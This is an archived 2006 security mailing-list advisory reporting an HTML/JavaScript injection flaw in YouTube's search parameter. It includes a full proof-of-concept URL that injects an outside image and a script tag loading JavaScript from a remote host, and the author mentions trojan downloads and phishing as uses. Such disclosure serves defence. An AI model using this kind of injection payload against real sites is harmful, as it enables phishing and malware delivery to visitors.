Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnwatch: You tube html/javascript code injection

You tube html/javascript code injection

From: <sectroyer_at_o2.pl>
Date: Thu, 08 Jun 2006 21:46:33 +0200

THere exist a lack of checking in the parametrs passed to the
search engine as a result it is possible to even change the contents
of the page. A successfull exploitation may not only allow to execute
js code for instance to download trojans, but it is also possible to
use as a phisher attack. Here is an example that illustrates the
threat:
http://www.youtube.com/results?search=gaki+no+tsuki%20%3Cimg%20src=%22http://www.danad.com.pl/pic/Zwierzeta/Kroliki/krolik%20002.jpg%22%3E%20%20%3Cscript%20src=%22http://michal.mooo.com/biuro/gora.js%22%20type=%22text/javascript%22%20language=%22JavaScript%22%3E%3C/script%3E%20%3Ca%20href=%22javascript:alert('exploited')%22%3EClick%20me%20to%20test%3C/a%3E&search_type=search_videos&search=Search
I would like to than my precious Magdalena Pogorzelska for her support.
Regards sectroyer(Micha³ Majchrowicz).
Received on Jun 12 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos